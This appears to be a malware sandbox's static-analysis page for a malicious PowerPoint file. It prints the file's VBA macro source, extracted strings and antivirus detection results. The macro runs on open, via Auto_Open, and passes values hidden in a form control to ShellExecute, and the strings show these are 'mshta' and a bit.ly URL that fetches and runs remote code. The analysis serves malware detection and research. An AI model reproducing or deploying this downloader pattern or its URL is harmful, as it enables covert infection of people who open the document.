Static | ZeroBOX

Original


                                        Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function microsoft()
Set Outlook = VBA.CreateObject("Outlook.Application")
Set microsoft = Outlook.CreateObject("Shell.Application")


End Function

                                    

Deobfuscated


                                        Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function microsoft()
Set Outlook = VBA.CreateObject("Outlook.Application")
Set microsoft = Outlook.CreateObject("Shell.Application")


End Function

                                    

Original


                                        Attribute VB_Name = "capstan"
Attribute VB_Base = "0{AF070039-9CC7-4F63-A9DA-D9E31F9F5173}{51DCA8FC-72FC-40AB-889F-976DA1255775}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


                                    

Deobfuscated


                                        Attribute VB_Name = "capstan"
Attribute VB_Base = "0{AF070039-9CC7-4F63-A9DA-D9E31F9F5173}{51DCA8FC-72FC-40AB-889F-976DA1255775}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


                                    

Original


                                        Attribute VB_Name = "Module1"
Sub Auto_Open()
Sheet2.microsoft.ShellExecute capstan.hhh.ControlTipText, capstan.hhh.Tag
End _
Sub



                                    

Deobfuscated


                                        Attribute VB_Name = "Module1"
Sub Auto_Open()
Sheet2.microsoft.ShellExecute capstan.hhh.ControlTipText, capstan.hhh.Tag
End _
Sub



                                    
Sheet2
capstan
Module1
ID="{00000000-0000-0000-0000-000000000000}"
Class=Sheet2
BaseClass=capstan
Module=Module1
HelpFile=""
Name="katan"
HelpContextID="0"
Description="katan"
VersionCompatible32="393222000"
CMG="8C8E2055E0C0E4C0E4C4E8C4E8"
DPB="FBF957CADBE7DBE72419DCE7F2AADEF1539FB795B6A849D821848E4F6A8B8FEC5C8A5451E5"
GC="6A68C67B347C347C34"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
Sheet2=192, 192, 1447, 841,
capstan=128, 128, 1383, 777, , 64, 64, 1319, 713,
Module1=160, 160, 1415, 809,
VERSION 5.00
Begin {C62A69F0-16DC-11CE-9E98-00AA00574A4F} capstan
Caption = "UserForm1"
ClientHeight = 3168
ClientLeft = 48
ClientTop = 396
ClientWidth = 4704
StartUpPosition = 1 'CenterOwner
TypeInfoVer = 2
Microsoft Forms 2.0 Form
Embedded Object
Forms.Form.1
Tahoma\S
"http://www.bitly.com/hyuiqohwkjbsk"
"mshta"/
PowerPoint
Win64x
Project1
stdole
VBAProject
Office
Module1b
_Evaluate
Class1
Sheet2
microsoft
Outlook,V
CreateObject
MSFormsC
Auto_OpenV
ShellExecute
ControlTipText8
capstan?
UserFormN
_B_var_Outlook
Module1
VBAProject
Class1
Sheet2
capstan
C:\Program Files (x86)\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
C:\Program Files (x86)\Microsoft Office\root\Office16\MSPPT.OLB
PowerPoint
C:\Windows\SysWOW64\stdole2.tlb
stdole
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\MSO.DLL
Office
C:\Windows\SysWOW64\FM20.DLL
MSForms
C:\Users\MASTER~1\AppData\Local\Temp\VBE\MSForms.exd
Auto_Open
UserForm
F3Dynamic
X9S2b$
VBInternal
microsoft
VBE7.DLL
Attribut
e VB_Nam
e = "Mod
ub Auto_@Open()
eet2.mic
rosoft.S
hellExec
capstan
.hhh.Con
trolTipT ext,
Attribut
e VB_Nam
e = "cap
070039-9
CC7-4F63
-A9DA-D9
E31F9F51
73}{51DC
A8FC-72
40AB-889
F-976DA1
255775}
d@Global
Creata
PredeHcla
BExpos
0Templ
ateDeriv
Customi
X9S2b$
X9S2b$
Outlook.Application
Shell.Application
Attribut
e VB_Nam
e = "She@et2"
t0{FCF
B3D2A-A0
FA-1068-
A738-080
02B3371B
|GlobaBl
dCre atabl
Pr@edecla
plateDer
tion mic
rosoft()
Set Ou tlook
aeObje
katan"
G{000204
0046}#2
.0#0#C:\
Windows\
SysWOW64
e2.tlb#
OLE Auto
mation
EOffic
D04C-5BF
A-101B-BHDE5
EProgr
am Files
(x86)\C ommon
icrosoft
Shared\
OFFICE16
\MSO.DLL
P 16.0
Object
Library
D452EE1-
-02608C@4D0BB4
M20L'B
r00}#0
4F14-B80
A-4193-9
43D-5E1F
E1DF7445
6Users\M
ASTER~1\
cal\Temp0\VBE
7.e<xd
Sheet2G
BDcaps
Widescreen
Calibri
Calibri Light
Office Theme
Fonts Used
Slide Titles
Joe Security LLC;
Joe Security LLC;
Joe Security LLC
Joe Security LLC
Master Mana
Microsoft Office PowerPoint
Root Entry
capstan
PROJECT
PROJECTwm
CompObj
2Sheet2
ncapstan
1Module1
VBFrame
Sheet2
capstan
Module1
__SRP_0
__SRP_1
__SRP_2
__SRP_3
__SRP_4
__SRP_5
__SRP_6
__SRP_7
_VBA_PROJECT
SummaryInformation
DocumentSummaryInformation
*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files (x86)\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{91493440-5A91-11CF-8700-00AA0060263B}#2.c#0#C:\Program Files (x86)\Microsoft Office\root\Office16\MSPPT.OLB#Microsoft PowerPoint 16.0 Object Library
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\SysWOW64\stdole2.tlb#OLE Automation
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
*\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\Windows\SysWOW64\FM20.DLL#Microsoft Forms 2.0 Object Library
*\G{D2594F14-B80A-4193-943D-5E1FE1DF7445}#2.0#0#C:\Users\MASTER~1\AppData\Local\Temp\VBE\MSForms.exd#Microsoft Forms 2.0 Object Library
Sheet2
096343d3ca
Sheet2
capstan
0=6343d447
capstan
Module1
0:6343d436
Module1
ShellExecute
Outlook.Application
Shell.Application
CreateObject
$*\Rffff*0:6343d436
$*\Rffff*096343d3ca
*\G{AC2DE821-36A2-11CF-8053-00AA006009FA}#2.0#0#..\..\..\..\Windows\SysWOW64\FM20.DLL\2#Microsoft Forms 2.0 Object Library*#26
$*\Rffff*0=6343d447
0{AF070039-9CC7-4F63-A9DA-D9E31F9F5173}{51DCA8FC-72FC-40AB-889F-976DA1255775}
$*\Rffff*0=6343d447
N0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}
$*\Rffff*096343d3ca
*\R0*#17
sQdole
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.Generic.a!c
DrWeb Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
McAfee W97M/Downloader.doj
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
Cyren PP97M/Agent.ADF.gen!Eldorado
Symantec W97M.Downloader
ESET-NOD32 VBA/TrojanDownloader.Agent.WQU
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky HEUR:Trojan-Downloader.Script.Generic
BitDefender VBA:Logan.1875
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
SUPERAntiSpyware Clean
MicroWorld-eScan VBA:Logan.1875
Tencent Clean
Ad-Aware VBA:Logan.1875
Sophos Clean
Comodo Clean
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition W97M/Downloader.doj
FireEye VBA:Logan.1875
Emsisoft VBA:Logan.1875 (B)
SentinelOne Clean
GData VBA:Logan.1875
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit VBA:Logan.D753
ViRobot Clean
ZoneAlarm Clean
Microsoft Clean
TACHYON Clean
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
ALYac VBA:Logan.1875
MAX malware (ai score=81)
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet VBA/Agent.KKK!tr
Panda Clean
No IRMA results available.